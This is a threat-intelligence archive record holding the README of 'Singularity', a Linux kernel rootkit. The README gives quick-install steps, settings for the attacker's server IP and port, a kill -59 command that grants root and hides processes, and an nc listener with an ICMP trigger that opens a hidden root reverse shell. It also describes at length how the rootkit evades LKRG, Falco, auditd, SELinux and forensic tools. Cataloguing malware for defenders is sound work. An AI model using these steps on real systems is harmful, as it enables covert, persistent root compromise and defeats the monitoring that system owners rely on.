{
	"id": "83eec287-b63c-4932-9a25-43836df2fcd4",
	"created_at": "2026-04-06T00:12:34.487237Z",
	"updated_at": "2026-04-10T13:11:32.508347Z",
	"deleted_at": null,
	"sha1_hash": "f8375217a2f8cc3d5f7cb1470e5f2f4553595be0",
	"title": "GitHub - MatheuZSecurity/Singularity: Stealthy Linux Kernel Rootkit for modern kernels (6x)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 617221,
	"plain_text": "GitHub - MatheuZSecurity/Singularity: Stealthy Linux Kernel\r\nRootkit for modern kernels (6x)\r\nBy MatheuZSecurity\r\nArchived: 2026-04-05 16:03:34 UTC\r\n\"Shall we give forensics a little work?\"\r\nSingularity is a powerful Linux Kernel Module (LKM) rootkit designed for modern 6.x kernels. It provides\r\ncomprehensive stealth capabilities through advanced system call hooking via ftrace infrastructure.\r\nFull Research Article (outdated version): Singularity: A Final Boss Linux Kernel Rootkit\r\nEDR Evasion Case Study: Bypassing Elastic EDR with Singularity\r\nPOC Video: Singularity vs eBPF security tools: Singularity vs eBPF security tools\r\nBreaking eBPF Security with Singularity hooks: Breaking eBPF\r\nWhat is Singularity?\r\nSingularity is a sophisticated rootkit that operates at the kernel level, providing:\r\nhttps://github.com/MatheuZSecurity/Singularity\r\nPage 1 of 16\n\nProcess Hiding: Make any process completely invisible to the system\r\nFile \u0026 Directory Hiding: Conceal files using pattern matching\r\nNetwork Stealth: Hide TCP/UDP connections, ports, and conntrack entries\r\nPrivilege Escalation: Signal-based instant root access\r\nLog Sanitization: Filter kernel logs and system journals in real-time\r\nSelf-Hiding: Remove itself from module lists and system monitoring\r\nRemote Access: ICMP-triggered reverse shell with automatic hiding\r\nAnti-Detection: Evade eBPF-based runtime security tools (Falco, Tracee), bypass Linux Kernel Runtime\r\nGuard (LKRG), and prevent io_uring bypass attempts\r\nAudit Evasion: Drop audit messages for hidden processes at netlink level with statistics tracking and\r\nsocket inode filtering\r\nMemory Forensics Evasion: Filter /proc/kcore, /proc/kallsyms, /proc/vmallocinfo\r\nCgroup Filtering: Filter hidden PIDs from cgroup.procs\r\nSyslog Evasion: Hook do_syslog to filter klogctl() kernel ring buffer access\r\nDebugfs Evasion: Filter output of tools like debugfs that read raw block devices\r\nConntrack Filtering: Hide connections from /proc/net/nf_conntrack and netlink\r\nSOCK_DIAG/NETFILTER queries\r\nSELinux Evasion: Automatic SELinux enforcing mode bypass on ICMP trigger\r\nLKRG Bypass: Evade Linux Kernel Runtime Guard detection mechanisms\r\neBPF Security Bypass: Hide processes from eBPF-based runtime security tools (Falco, Tracee)\r\nFeatures\r\nSignal-based privilege elevation (kill -59)\r\nComplete process hiding from /proc and monitoring tools\r\nPattern-based filesystem hiding for files and directories\r\nNetwork connection concealment from netstat, ss, conntrack, and packet analyzers\r\nAdvanced netlink filtering (SOCK_DIAG, NETFILTER/conntrack messages)\r\nReal-time kernel log filtering for dmesg, journalctl, and klogctl\r\nModule self-hiding from lsmod and /sys/module\r\nAutomatic kernel taint flag normalization\r\nBPF data filtering to prevent eBPF-based detection\r\nio_uring protection against asynchronous I/O bypass\r\nLog masking for kernel messages and system logs\r\nEvasion of standard rootkit detectors (unhide, chkrootkit, rkhunter)\r\nAutomatic child process tracking and hiding via tracepoint hooks\r\nMulti-architecture support (x64 + ia32)\r\nNetwork packet-level filtering with raw socket protection\r\nProtection against all file I/O variants (read, write, splice, sendfile, tee, copy_file_range)\r\nNetlink-level audit message filtering with statistics tracking to evade auditd detection\r\nSocket inode tracking for comprehensive network hiding\r\nCgroup PID filtering to prevent detection via /sys/fs/cgroup/*/cgroup.procs\r\nTaskStats netlink blocking to prevent PID enumeration\r\nhttps://github.com/MatheuZSecurity/Singularity\r\nPage 2 of 16\n\n/proc/kcore filtering to evade memory forensics tools (Volatility, crash, gdb)\r\ndo_syslog hook to filter klogctl() and prevent kernel ring buffer leaks\r\nBlock device output filtering to evade debugfs and similar disk forensics tools\r\njournalctl -k output filtering via write hook\r\nSELinux enforcing mode bypass capability for ICMP-triggered shells\r\nLKRG integrity checks bypass for hidden processes\r\nFalco event hiding via BPF ringbuffer and perf event interception\r\nInstallation\r\nPrerequisites\r\nLinux kernel 6.x\r\nKernel headers for your running kernel\r\nGCC and Make\r\nRoot access\r\nQuick Install\r\ncd /dev/shm\r\ngit clone https://github.com/MatheuZSecurity/Singularity\r\ncd Singularity\r\nsudo bash setup.sh\r\ncd ..\r\nThat's it. The module automatically:\r\nHides itself from lsmod, /proc/modules, /sys/module\r\nClears kernel taint flags\r\nFilters sensitive strings from dmesg, journalctl -k, klogctl\r\nStarts protecting your hidden files and processes\r\nImportant Notes\r\nThe module automatically hides itself after loading\r\nThere is no unload feature - reboot required to remove\r\nTest in a VM first - cannot be removed without restarting\r\nConfiguration\r\nSet Your Server IP and Port\r\nEdit include/core.h :\r\nhttps://github.com/MatheuZSecurity/Singularity\r\nPage 3 of 16\n\n#define YOUR_SRV_IP \"192.168.1.100\" // Change this to your server IP\r\n#define YOUR_SRV_IPv6 { .s6_addr = { [15] = 1 } } // IPv6 if needed\r\nEdit modules/icmp.c :\r\n#define SRV_PORT \"8081\" // Change this to your desired port\r\nEdit modules/bpf_hook.c :\r\n#define HIDDEN_PORT 8081 // Must match SRV_PORT\r\nEdit modules/hiding_tcp.c :\r\n#define PORT 8081 // Must match SRV_PORT\r\nImportant: All port definitions must match for proper network hiding and ICMP reverse shell functionality.\r\nUsage\r\nHide Processes\r\n# Hide current shell\r\nkill -59 $$\r\n# Hide specific process\r\nkill -59 \u003cPID\u003e\r\nProcess will be invisible to ps, top, htop, /proc, and all monitoring tools. All child processes are automatically\r\ntracked and hidden.\r\nhttps://github.com/MatheuZSecurity/Singularity\r\nPage 4 of 16\n\nHide Files \u0026 Directories\r\nFiles matching your configured patterns are automatically hidden:\r\nmkdir singularity\r\necho \"secret\" \u003e singularity/data.txt\r\n# Invisible to ls, find, locate\r\nls -la | grep singularity\r\n# (no output)\r\n# But you can still access it\r\ncat singularity/data.txt\r\n# secret\r\n# cd is blocked for security\r\ncd singularity\r\n# bash: cd: singularity: No such file or directory\r\nBecome Root\r\nSignal-based method:\r\nkill -59 $$\r\nid # uid=0(root)\r\nhttps://github.com/MatheuZSecurity/Singularity\r\nPage 5 of 16\n\nHide Network Connections\r\nConnections on your configured port (default: 8081) are automatically hidden:\r\nnc -lvnp 8081\r\n# Invisible to all monitoring\r\nss -tulpn | grep 8081 # (no output)\r\nnetstat -tulpn | grep 8081 # (no output)\r\nlsof -i :8081 # (no output)\r\ncat /proc/net/nf_conntrack | grep 8081 # (no output)\r\n# Even advanced netlink queries are filtered\r\nss -tapen | grep 8081 # (no output)\r\nconntrack -L | grep 8081 # (no output)\r\nPackets are dropped at raw socket level (tpacket_rcv) and hidden from:\r\n/proc/net/* interfaces (tcp, tcp6, udp, udp6)\r\n/proc/net/nf_conntrack\r\nNetlink SOCK_DIAG queries (used by ss, lsof)\r\nNetlink NETFILTER/conntrack messages (used by conntrack tool)\r\nhttps://github.com/MatheuZSecurity/Singularity\r\nPage 6 of 16\n\nICMP Reverse Shell\r\nTrigger a hidden reverse shell remotely with automatic SELinux bypass:\r\n1. Start listener:\r\nnc -lvnp 8081 # Use your configured port\r\n2. Send ICMP trigger:\r\nsudo python3 scripts/trigger.py \u003ctarget_ip\u003e\r\n3. Receive root shell (automatically hidden with all child processes, SELinux enforcing mode bypassed if active)\r\nhttps://github.com/MatheuZSecurity/Singularity\r\nPage 7 of 16\n\nProtection Mechanisms\r\nFtrace Control Protection\r\nAll attempts to disable ftrace are silently intercepted and blocked:\r\necho 0 \u003e /proc/sys/kernel/ftrace_enabled # Appears successful but does nothing\r\nProtected syscalls: write, writev, pwrite64, pwritev, pwritev2, sendfile, sendfile64, splice, vmsplice, tee,\r\ncopy_file_range, io_uring_enter (with intelligent per-PID caching)\r\nBPF Syscall Filtering\r\nThe bpf_hook.c module implements a sophisticated anti-detection system against eBPF-based security tools.\r\nRather than blocking BPF syscalls entirely (which would be a detection fingerprint), it selectively filters data at\r\nthe kernel level to make hidden processes and connections invisible to eBPF programs.\r\nStrategy: Intercept data collection and reporting functions used by eBPF programs, not the BPF syscall itself.\r\nThis allows legitimate eBPF tools to run normally while preventing them from seeing hidden resources.\r\nProtected resources:\r\nHidden processes and their entire process tree (up to 10 parent levels)\r\nNetwork connections on configured port (default: 8081) or to configured IP address\r\nSocket inodes associated with hidden processes\r\nInterception points:\r\nIterator execution (process/socket enumeration)\r\nRingbuffer operations (event submission to userspace)\r\nBPF map operations (PID lookups and insertions)\r\nPerf event output (legacy eBPF event delivery)\r\nSeq file writes (output formatting)\r\nProgram execution (context-based filtering)\r\nThis approach defeats eBPF security tools without triggering alerts that would come from blocking BPF\r\noperations entirely.\r\nio_uring Protection\r\nProtection against io_uring bypass in ftrace_enabled and tracing_on attempts with intelligent caching (1 second\r\ncache per PID to prevent repeated process scanning and reduce overhead)\r\nLog Sanitization\r\nReal-time filtering of sensitive strings from all kernel log interfaces:\r\nhttps://github.com/MatheuZSecurity/Singularity\r\nPage 8 of 16\n\nInterface Hook Status\r\ndmesg read hook on /proc/kmsg Filtered\r\njournalctl -k write hook (output filtering) Filtered\r\nklogctl() / syslog() do_syslog hook Filtered\r\n/sys/kernel/debug/tracing/* read hook Filtered\r\n/var/log/kern.log , syslog , auth.log read hook Filtered\r\n/proc/kallsyms , /proc/kcore , /proc/vmallocinfo read hook Filtered\r\n/proc/net/nf_conntrack read hook Filtered\r\nFiltered keywords: taint, journal, singularity, Singularity, matheuz, zer0t, kallsyms_lookup_name, obliviate, hook,\r\nhooked_, constprop, clear_taint, ftrace_helper, fh_install, fh_remove\r\nNote: Audit messages for hidden PIDs are dropped at netlink level with statistics tracking\r\n(get_blocked_audit_count, get_total_audit_count)\r\nDisk Forensics Evasion\r\nSingularity hooks the write syscall to detect and filter output from disk forensics tools:\r\nHow it works:\r\n1. Detects if process has a block device open ( /dev/sda , /dev/nvme0n1 , etc)\r\n2. Detects debugfs-style output patterns (inode listings, filesystem metadata)\r\n3. Sanitizes hidden patterns in-place (replaces with spaces to maintain buffer size/checksums)\r\n# Hidden files are invisible even to raw disk analysis\r\ndebugfs /dev/sda3 -R 'ls -l /home/user/singularity'\r\n# (spaces where \"singularity\" was)\r\n# The pattern is sanitized in the output buffer\r\n# Checksums remain valid, no corruption\r\nDetected patterns:\r\ndebugfs: prefix\r\nInode listings with parentheses\r\nInode count: , Block count: , Filesystem volume name:\r\nFilesystem UUID: , e2fsck , Inode:\r\nProcess Hiding Implementation\r\nhttps://github.com/MatheuZSecurity/Singularity\r\nPage 9 of 16\n\nComplete hiding from syscalls and kernel interfaces:\r\n/proc/[pid]/* (openat, readlinkat blocked)\r\ngetdents, getdents64 (directory listing filtered)\r\nstat, lstat, statx, newfstatat (metadata hidden)\r\nkill with signal 0 (returns ESRCH)\r\ngetsid, getpgid, getpgrp (returns ESRCH)\r\nsched_getaffinity, sched_getparam, sched_getscheduler, sched_rr_get_interval (returns ESRCH)\r\ngetpriority (returns ESRCH)\r\nsysinfo (process count adjusted)\r\npidfd_open (returns ESRCH)\r\nTaskStats netlink queries (returns ESRCH)\r\nCgroup PIDs filtered from cgroup.procs\r\nChild processes automatically tracked via sched_process_fork tracepoint hook.\r\nLKRG Bypass\r\nSingularity implements comprehensive evasion against Linux Kernel Runtime Guard:\r\nBypassed checks:\r\nProcess credential validation (p_cmp_creds)\r\nTask structure integrity (p_cmp_tasks)\r\nControl Flow Integrity validation (p_ed_pcfi_validate_sp, p_ed_enforce_pcfi)\r\nKernel integrity checks (p_check_integrity)\r\nExploit detection subsystem (p_exploit_detection_init)\r\nUser-mode helper tracking (p_call_usermodehelper_entry, p_call_usermodehelper_exec_entry)\r\nTask dumping and enumeration (p_dump_task_f, ed_task_add)\r\nKprobe ftrace handler interception\r\nFeatures:\r\nAutomatic LKRG detection and hook installation\r\nProcess lineage verification (hides entire process trees up to 64 levels deep)\r\nUMH bypass for reverse shell operations\r\nModule notification system for detecting LKRG loading\r\nHidden processes are invisible to all LKRG integrity verification mechanisms.\r\nFalco Bypass\r\nSingularity implements a comprehensive anti-EDR defense system that prevents eBPF-based security tools from\r\ndetecting hidden processes and network connections. The protection works by intercepting kernel functions that\r\neBPF programs use to collect and report data.\r\nhttps://github.com/MatheuZSecurity/Singularity\r\nPage 10 of 16\n\nProtected against:\r\nFalco (event-based runtime security)\r\nTracee (security tracing)\r\nbpftool and ss with BPF backend\r\nMulti-layer interception:\r\n1. Iterator filtering (bpf_iter_run_prog)\r\nFilters sockets on hidden port from TCP/UDP iterators\r\nHides processes and their children from task iterators\r\nPrevents detection via ss and process enumeration tools\r\n2. Ringbuffer event blocking (bpf_ringbuf_output, bpf_ringbuf_reserve, bpf_ringbuf_submit)\r\nDetects Falco event structures by analyzing header format\r\nBlocks event allocation, submission, and output for hidden PIDs\r\nPrevents syscall events from reaching Falco userspace agent\r\n3. BPF map manipulation (bpf_map_lookup_elem, bpf_map_update_elem)\r\nReturns NULL when eBPF looks up hidden PIDs in maps\r\nSilently drops map insertions where key is a hidden PID\r\nPrevents eBPF security tools from tracking hidden processes\r\n4. Perf event suppression (perf_event_output, perf_trace_run_bpf_submit)\r\nBlocks perf-based event submission from hidden processes\r\nPrevents legacy eBPF tools from receiving trace data\r\n5. Seq file filtering (bpf_seq_write, bpf_seq_printf)\r\nScans output data for hidden PIDs before writing\r\nPrevents leakage via /proc interfaces used by eBPF iterators\r\n6. Program execution control (__bpf_prog_run)\r\nBlocks eBPF program execution when running in hidden process context\r\nPrevents any eBPF-based monitoring of hidden process internals\r\nSocket and connection hiding:\r\nCaches hidden IP address for performance\r\nFilters sockets based on configured port and configured IP\r\nHides both IPv4 and IPv6 connections\r\nWorks at iterator level (before data reaches eBPF programs)\r\nProcess lineage tracking:\r\nhttps://github.com/MatheuZSecurity/Singularity\r\nPage 11 of 16\n\nTraces parent process chain up to 10 levels deep\r\nAutomatically hides all descendants of hidden processes\r\nEnsures child processes spawned after hiding remain invisible\r\nHidden processes and connections generate zero events visible to eBPF security tools.\r\nBypassed Security Tools\r\nProcess Monitoring: ps, top, htop, atop, pidof\r\nFilesystem: ls, find, locate, stat, lstat, readlink, tree\r\nDisk Forensics: debugfs, e2fsck (output filtered via write hook)\r\nMemory Forensics: Volatility, crash, gdb (via /proc/kcore filtering)\r\nNetwork: netstat, ss, lsof, tcpdump, wireshark, conntrack, nload, iftop, /proc/net/*\r\nLogs \u0026 Traces: dmesg, journalctl, klogctl, strace, ltrace, ftrace, perf\r\nRootkit Detectors: unhide, chkrootkit, rkhunter, OSSEC\r\nModule Detection: lsmod, modinfo, /sys/module, /proc/modules, kmod\r\nKernel Security: LKRG (Linux Kernel Runtime Guard)\r\neBPF Security Tools:\r\nFalco (runtime security monitoring)\r\nTracee (security tracing)\r\nbpftrace, bpftool (when used for monitoring)\r\nEDR/Monitoring: io_uring-based monitors, some Linux EDR solutions, auditd\r\nSyscall Hooks\r\nSyscall/Function Module Purpose\r\ngetdents, getdents64 hiding_directory.c Filter directory entries, hide PIDs\r\nstat, lstat, newstat, newlstat, statx, newfstatat hiding_stat.c Hide file metadata, adjust nlink\r\ngetpriority hiding_stat.c\r\nHide priority queries for hidden\r\nPIDs\r\nopenat open.c\r\nBlock access to hidden\r\n/proc/[pid]\r\nreadlinkat hiding_readlink.c Block symlink resolution\r\nhttps://github.com/MatheuZSecurity/Singularity\r\nPage 12 of 16\n\nSyscall/Function Module Purpose\r\nchdir hiding_chdir.c Prevent cd into hidden dirs\r\nread, pread64, readv, preadv clear_taint_dmesg.c\r\nFilter kernel logs, kcore,\r\nkallsyms, cgroup PIDs,\r\nnf_conntrack\r\ndo_syslog clear_taint_dmesg.c\r\nFilter klogctl()/syslog() kernel\r\nring buffer\r\nsched_debug_show clear_taint_dmesg.c Filter scheduler debug output\r\nwrite, writev, pwrite64, pwritev, pwritev2 hooks_write.c\r\nBlock ftrace control + filter disk\r\nforensics + filter journalctl\r\noutput\r\nsendfile, sendfile64, copy_file_range hooks_write.c\r\nBlock file copies to protected\r\nfiles\r\nsplice, vmsplice, tee hooks_write.c\r\nBlock pipe-based writes to\r\nprotected files\r\nio_uring_enter hooks_write.c\r\nBlock async I/O bypass with PID\r\ncaching\r\nkill become_root.c Root trigger + hide processes\r\ngetsid, getpgid, getpgrp become_root.c Returns ESRCH for hidden PIDs\r\nsched_getaffinity, sched_getparam,\r\nsched_getscheduler, sched_rr_get_interval\r\nbecome_root.c Returns ESRCH for hidden PIDs\r\nsysinfo become_root.c Adjusts process count\r\npidfd_open become_root.c Returns ESRCH for hidden PIDs\r\ntcp4_seq_show, tcp6_seq_show hiding_tcp.c\r\nHide TCP connections from\r\n/proc/net\r\nudp4_seq_show, udp6_seq_show hiding_tcp.c\r\nHide UDP connections from\r\n/proc/net\r\ntpacket_rcv hiding_tcp.c Drop packets at raw socket level\r\nrecvmsg, recvfrom audit.c\r\nFilter netlink SOCK_DIAG and\r\nNETFILTER messages\r\nhttps://github.com/MatheuZSecurity/Singularity\r\nPage 13 of 16\n\nSyscall/Function Module Purpose\r\nnetlink_unicast audit.c\r\nDrop audit messages for hidden\r\nPIDs\r\naudit_log_start audit.c\r\nBlock audit log creation for\r\nhidden processes\r\nbpf bpf_hook.c\r\nFilter eBPF operations for hidden\r\nPIDs\r\nbpf_iter_run_prog bpf_hook.c\r\nHide hidden processes from BPF\r\niterators\r\nbpf_seq_write, bpf_seq_printf bpf_hook.c Filter BPF seq file output\r\nbpf_ringbuf_output, bpf_ringbuf_reserve,\r\nbpf_ringbuf_submit\r\nbpf_hook.c Filter Falco events via ringbuffer\r\nbpf_map_lookup_elem, bpf_map_update_elem bpf_hook.c Filter BPF map operations\r\nperf_event_output, perf_trace_run_bpf_submit bpf_hook.c\r\nFilter perf events for hidden\r\nprocesses\r\n__bpf_prog_run bpf_hook.c Filter BPF program execution\r\nicmp_rcv icmp.c\r\nICMP-triggered reverse shell\r\nwith SELinux bypass\r\ntaskstats_user_cmd task.c\r\nBlock TaskStats queries for\r\nhidden PIDs\r\nsched_process_fork (tracepoint) trace.c Track child processes\r\nkprobe_ftrace_handler lkrg_bypass.c Bypass LKRG kprobe detection\r\np_cmp_creds, p_cmp_tasks lkrg_bypass.c Bypass LKRG credential checks\r\np_ed_pcfi_validate_sp, p_ed_enforce_pcfi lkrg_bypass.c Bypass LKRG CFI validation\r\np_check_integrity lkrg_bypass.c Bypass LKRG integrity checks\r\np_dump_task_f, ed_task_add lkrg_bypass.c\r\nHide from LKRG task\r\nenumeration\r\np_call_usermodehelper_entry,\r\np_call_usermodehelper_exec_entry\r\nlkrg_bypass.c Bypass LKRG UMH tracking\r\np_exploit_detection_init lkrg_bypass.c Bypass LKRG exploit detection\r\nhttps://github.com/MatheuZSecurity/Singularity\r\nPage 14 of 16\n\nSyscall/Function Module Purpose\r\ntainted_mask (kthread) reset_tainted.c Clear kernel taint flags\r\nmodule_hide_current hide_module.c\r\nRemove from module lists and\r\nsysfs\r\nMulti-Architecture Support: x86_64 ( __x64_sys_* ) and ia32 ( __ia32_sys_* , __ia32_compat_sys_* )\r\nTested Kernel Versions\r\nKernel Version Distribution Status Notes\r\n6.8.0-79-generic Ubuntu 22.04 / 24.04 Stable Primary development environment\r\n6.12.0-174.el10.x86_64 CentOS Stream 10 Stable RHEL-based kernel\r\n6.12.48+deb13-amd64 Debian 13 (Trixie) Stable Debian kernel\r\n6.17.8-300.fc43.x86_64 Fedora 43 Stable SELinux enforcing bypass validated\r\n6.17.0-8-generic Ubuntu 25.10 Stable Newer generic kernel, fully functional\r\n6.14.0-37-generic Ubuntu 24.04 Stable LKRG and Falco bypass validated\r\n6.12.25-amd64 Kali Linux Stable Kali 6.12.25-1kali1\r\nThe Plot\r\nUnfortunately for some...\r\nEven with all these filters, protections, and hooks, there are still ways to detect this rootkit.\r\nBut if you're a good forensic analyst, DFIR professional, or malware researcher, I'll let you figure it out on your\r\nown.\r\nI won't patch for this, because it will be much more OP ;)\r\nCredits\r\nSingularity was created by MatheuZSecurity (Matheus Alves)\r\nLinkedIn: mathsalves\r\nDiscord: kprobe\r\nJoin Rootkit Researchers: Discord - https://discord.gg/66N5ZQppU7\r\nCode References\r\nhttps://github.com/MatheuZSecurity/Singularity\r\nPage 15 of 16\n\nfuxSocy\r\nAdrishya\r\nMatheuZSecurity/Rootkit\r\nResearch Inspiration\r\nKoviD\r\nBasilisk\r\nGOAT Diamorphine rootkit\r\nContributing\r\nSubmit pull requests for improvements\r\nReport bugs via GitHub issues\r\nSuggest new evasion techniques\r\nShare detection methods (for research)\r\nFound a bug? Open an issue or contact me on Discord: kprobe\r\nFOR EDUCATIONAL AND RESEARCH PURPOSES ONLY\r\nSingularity was created as a research project to explore the limits of kernel-level stealth techniques. The goal is to\r\nanswer one question: \"How far can a rootkit hide if it manages to infiltrate and load into a system?\"\r\nThis project exists to:\r\nPush the boundaries of offensive security research\r\nHelp defenders understand what they're up against\r\nProvide a learning resource for kernel internals and evasion techniques\r\nContribute to the security community's knowledge base\r\nI am not responsible for any misuse of this software. If you choose to use Singularity for malicious purposes,\r\nthat's on you. This tool is provided as-is for research, education, and authorized security testing only.\r\nTest only on systems you own or have explicit written permission to test. Unauthorized access to computer\r\nsystems is illegal in most jurisdictions.\r\nBe a researcher, not a criminal.\r\nSource: https://github.com/MatheuZSecurity/Singularity\r\nhttps://github.com/MatheuZSecurity/Singularity\r\nPage 16 of 16",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://github.com/MatheuZSecurity/Singularity"
	],
	"report_names": [
		"Singularity"
	],
	"threat_actors": [],
	"ts_created_at": 1775434354,
	"ts_updated_at": 1775826692,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f8375217a2f8cc3d5f7cb1470e5f2f4553595be0.pdf",
		"text": "https://archive.orkl.eu/f8375217a2f8cc3d5f7cb1470e5f2f4553595be0.txt",
		"img": "https://archive.orkl.eu/f8375217a2f8cc3d5f7cb1470e5f2f4553595be0.jpg"
	}
}